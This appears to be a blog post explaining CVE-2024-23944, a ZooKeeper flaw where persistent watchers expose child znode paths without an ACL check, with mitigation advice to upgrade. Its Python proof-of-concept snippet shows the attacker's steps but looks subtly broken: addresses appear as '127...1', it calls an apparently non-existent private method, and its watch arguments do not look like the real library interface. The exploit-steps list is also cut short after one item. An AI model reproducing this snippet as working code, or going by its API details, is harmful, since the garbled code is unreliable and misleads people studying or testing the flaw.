CVE-2024-23944 - Information Disclosure in Persistent Watchers Handling in Apache ZooKeeper Due to Missing ACL Check

A recent vulnerability discovered in Apache ZooKeeper could potentially lead to information disclosure when persistent watchers are not handled properly. The vulnerability, CVE-2024-23944, allows an attacker to monitor child znodes by attaching a persistent watcher to a parent znode which the attacker already has access to. This post will provide a detailed explanation of the vulnerability, how it can be exploited, and recommendations to protect your Apache ZooKeeper servers.

Background

Apache ZooKeeper is an open-source distributed coordination service that is often used for managing configuration information, synchronizing distributed systems, and organizing leadership elections. It provides a hierarchical tree structure (znodes) to store and manage data, and these znodes can be assigned access control lists (ACLs) to control access.

The Vulnerability (CVE-2024-23944)

The vulnerability arises when a persistent watcher (addWatch command) is added by the attacker to a parent znode that they already have access to. When the persistent watcher is triggered, the ZooKeeper server does not perform an ACL check, thus exposing the full path of znodes affected by the watch event to the owner of the watcher.

It's crucial to note that this vulnerability only exposes the path of the znode, not the data stored within it. However, znode paths can contain sensitive information like usernames or login IDs, making this issue potentially critical.

Example Code Snippet

The following sample code snippet demonstrates an Apache ZooKeeper server that suffers from the vulnerable configuration:

from kazoo.client import KazooClient
from kazoo.security import make_acl

# Setting up a vulnerable ZooKeeper server
zk = KazooClient(hosts='127...1:2181')

# Assuming the attacker has access to the parent znode (/parent)
zk.ensure_path('/parent')

# Creating the child znode with sensitive information
zk.create('/parent/child', acl=[make_acl('ip', '127...1', all=True)])

# Attacker adds a persistent watcher to the parent znode
zk.add_watch('/parent', send_event=True, type='child')

# Child znode path is exposed when the watch is triggered
watch_event = zk._watch_poll()
print(f"Exposed child znode: {watch_event.path}")

Exploit Details

An attacker could use this vulnerability to gain access to sensitive information contained within znode paths. To exploit this vulnerability, the attacker would need to:

Monitor watch events to gather information about child znodes.

Since ACL checks are not performed when the persistent watcher is triggered, sensitive information in the znodes could potentially be exposed to the attacker, leading to information disclosure.

Mitigation

Apache ZooKeeper has released version 3.9.2, 3.8.4 to address this vulnerability. Users are urged to upgrade to these versions immediately to mitigate the issue. The patch ensures that the ACL check is carried out when persistent watchers are triggered, preventing unauthorized access to znode paths.

Original References

- Apache ZooKeeper Security Advisory
- CVE-2024-23944 Details

Conclusion

CVE-2024-23944 is a critical vulnerability in Apache ZooKeeper that could lead to information disclosure due to missing ACL checks in persistent watchers handling. It's essential to take this vulnerability seriously and upgrade your ZooKeeper servers to the patched versions (3.9.2, 3.8.4) as soon as possible to protect your systems and sensitive data.

Timeline

Published on: 03/15/2024 11:15:08 UTC
Last modified on: 06/04/2024 17:45:46 UTC